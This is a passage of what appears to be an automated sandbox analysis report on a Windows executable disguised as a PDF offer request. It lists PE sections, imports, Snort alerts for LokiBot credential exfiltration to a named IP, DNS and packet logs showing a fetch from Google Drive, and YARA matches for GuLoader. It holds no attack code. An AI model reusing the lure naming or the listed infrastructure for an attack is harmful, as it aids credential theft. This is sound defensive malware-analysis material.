                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b4.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x61f10x6200False0.6656967474489796data6.477074763411717IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata0x80000x13a40x1400False0.4529296875data5.163001655755973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data0xa0000x203380x600False0.501953125data3.9745558434885093IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .ndata0x2b0000x3e0000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x690000xb480xc00False0.4228515625data4.372183800985918IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountry
                                RT_ICON0x691c00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States
                                RT_DIALOG0x694a80x100dataEnglishUnited States
                                RT_DIALOG0x695a80x11cdataEnglishUnited States
                                RT_DIALOG0x696c80xc4dataEnglishUnited States
                                RT_DIALOG0x697900x60dataEnglishUnited States
                                RT_GROUP_ICON0x697f00x14dataEnglishUnited States
                                RT_MANIFEST0x698080x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States

                                Imports

                                DLLImport
                                KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, CreateFileW, GetFileSize, MoveFileW, SetFileAttributesW, GetModuleFileNameW, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, WaitForSingleObject, GetCurrentProcess, CompareFileTime, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GetDiskFreeSpaceW, lstrlenW, lstrcpynW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
                                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                Possible Origin

                                Language of compilation systemCountry where language is spokenMap
                                EnglishUnited States

                                Network Behavior

                                Snort IDS Alerts

                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                192.168.11.20157.245.36.2749838802021641 11/30/22-00:31:37.333969TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983880192.168.11.20157.245.36.27
                                192.168.11.20157.245.36.2749838802024317 11/30/22-00:31:37.333969TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24983880192.168.11.20157.245.36.27
                                192.168.11.20157.245.36.2749838802024312 11/30/22-00:31:37.333969TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14983880192.168.11.20157.245.36.27

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Nov 30, 2022 00:31:35.123769999 CET49836443192.168.11.20142.250.185.238
                                Nov 30, 2022 00:31:35.123786926 CET44349836142.250.185.238192.168.11.20
                                Nov 30, 2022 00:31:35.124044895 CET49836443192.168.11.20142.250.185.238
                                Nov 30, 2022 00:31:35.137362957 CET49836443192.168.11.20142.250.185.238
                                Nov 30, 2022 00:31:35.137372017 CET44349836142.250.185.238192.168.11.20
                                Nov 30, 2022 00:31:35.172802925 CET44349836142.250.185.238192.168.11.20
                                Nov 30, 2022 00:31:35.173031092 CET49836443192.168.11.20142.250.185.238
                                Nov 30, 2022 00:31:35.173213005 CET49836443192.168.11.20142.250.185.238
                                Nov 30, 2022 00:31:35.173417091 CET44349836142.250.185.238192.168.11.20
                                Nov 30, 2022 00:31:35.173674107 CET49836443192.168.11.20142.250.185.238
                                Nov 30, 2022 00:31:35.302972078 CET49836443192.168.11.20142.250.185.238
                                Nov 30, 2022 00:31:35.304261923 CET44349836142.250.185.238192.168.11.20
                                Nov 30, 2022 00:31:35.304462910 CET49836443192.168.11.20142.250.185.238
                                Nov 30, 2022 00:31:35.308245897 CET49836443192.168.11.20142.250.185.238
                                Nov 30, 2022 00:31:35.348491907 CET44349836142.250.185.238192.168.11.20
                                Nov 30, 2022 00:31:35.606657982 CET44349836142.250.185.238192.168.11.20
                                Nov 30, 2022 00:31:35.606863022 CET44349836142.250.185.238192.168.11.20
                                Nov 30, 2022 00:31:35.606874943 CET49836443192.168.11.20142.250.185.238
                                Nov 30, 2022 00:31:35.607048035 CET49836443192.168.11.20142.250.185.238
                                Nov 30, 2022 00:31:35.608479023 CET49836443192.168.11.20142.250.185.238
                                Nov 30, 2022 00:31:35.608555079 CET44349836142.250.185.238192.168.11.20
                                Nov 30, 2022 00:31:35.794887066 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:35.794929981 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:35.795146942 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:35.795490026 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:35.795507908 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:35.858731031 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:35.858937979 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:35.859126091 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:35.860200882 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:35.860357046 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:35.860357046 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:35.864449978 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:35.864485025 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:35.864960909 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:35.865122080 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:35.865542889 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:35.912424088 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:36.193646908 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:36.193851948 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:36.194185972 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:36.194263935 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:36.194359064 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:36.194547892 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:36.195283890 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:36.195485115 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:36.195549965 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:36.195982933 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:36.196171045 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:36.196225882 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:36.196439028 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:36.198167086 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:36.198345900 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:36.198385954 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:36.198849916 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:36.201076031 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:36.201406956 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:36.203979969 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:36.204233885 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:36.204291105 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:36.204576015 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:36.204622984 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:36.204778910 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:36.204869986 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:36.204936028 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:36.204979897 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:36.205188990 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:36.205256939 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:36.205456018 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:36.205496073 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:36.205528975 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:36.205698967 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:36.205699921 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:36.206115007 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:36.206336021 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:36.206392050 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:36.206670046 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:36.206896067 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:36.207021952 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:36.207073927 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:36.207273006 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:36.207426071 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:36.207664013 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:36.207719088 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:36.207990885 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:36.208270073 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:36.208506107 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:36.208565950 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:36.208812952 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:36.209053993 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:36.209290028 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:36.209343910 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:36.209602118 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:36.209661961 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:36.209861040 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:36.209897995 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:36.210105896 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:36.210390091 CET44349837142.250.185.161192.168.11.20
                                Nov 30, 2022 00:31:36.210585117 CET49837443192.168.11.20142.250.185.161
                                Nov 30, 2022 00:31:36.210622072 CET44349837142.250.185.161192.168.11.20

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Nov 30, 2022 00:31:35.102749109 CET4924053192.168.11.201.1.1.1
                                Nov 30, 2022 00:31:35.111932993 CET53492401.1.1.1192.168.11.20
                                Nov 30, 2022 00:31:35.755490065 CET5391953192.168.11.201.1.1.1
                                Nov 30, 2022 00:31:35.793382883 CET53539191.1.1.1192.168.11.20

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Nov 30, 2022 00:31:35.102749109 CET192.168.11.201.1.1.10x6df6Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:31:35.755490065 CET192.168.11.201.1.1.10x3147Standard query (0)doc-0g-8k-docs.googleusercontent.comA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Nov 30, 2022 00:31:35.111932993 CET1.1.1.1192.168.11.200x6df6No error (0)drive.google.com142.250.185.238A (IP address)IN (0x0001)false
                                Nov 30, 2022 00:31:35.793382883 CET1.1.1.1192.168.11.200x3147No error (0)doc-0g-8k-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                Nov 30, 2022 00:31:35.793382883 CET1.1.1.1192.168.11.200x3147No error (0)googlehosted.l.googleusercontent.com142.250.185.161A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • drive.google.com
                                • doc-0g-8k-docs.googleusercontent.com
                                • 157.245.36.27

                                Statistics

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:2
                                Start time:00:31:01
                                Start date:30/11/2022
                                Path:C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
                                Imagebase:0x400000
                                File size:194987 bytes
                                MD5 hash:B9F70F4146B846179FA182AC868D0C15
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000002.00000002.54385682867.00000000007CC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low

                                General

                                Target ID:5
                                Start time:00:31:18
                                Start date:30/11/2022
                                Path:C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
                                Imagebase:0x400000
                                File size:194987 bytes
                                MD5 hash:B9F70F4146B846179FA182AC868D0C15
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000000.54201456373.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low

                                General

                                Target ID:8
                                Start time:00:31:37
                                Start date:30/11/2022
                                Path:C:\Windows\SysWOW64\WerFault.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 1980
                                Imagebase:0x520000
                                File size:482640 bytes
                                MD5 hash:40A149513D721F096DDF50C04DA2F01F
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Disassembly

                                No disassembly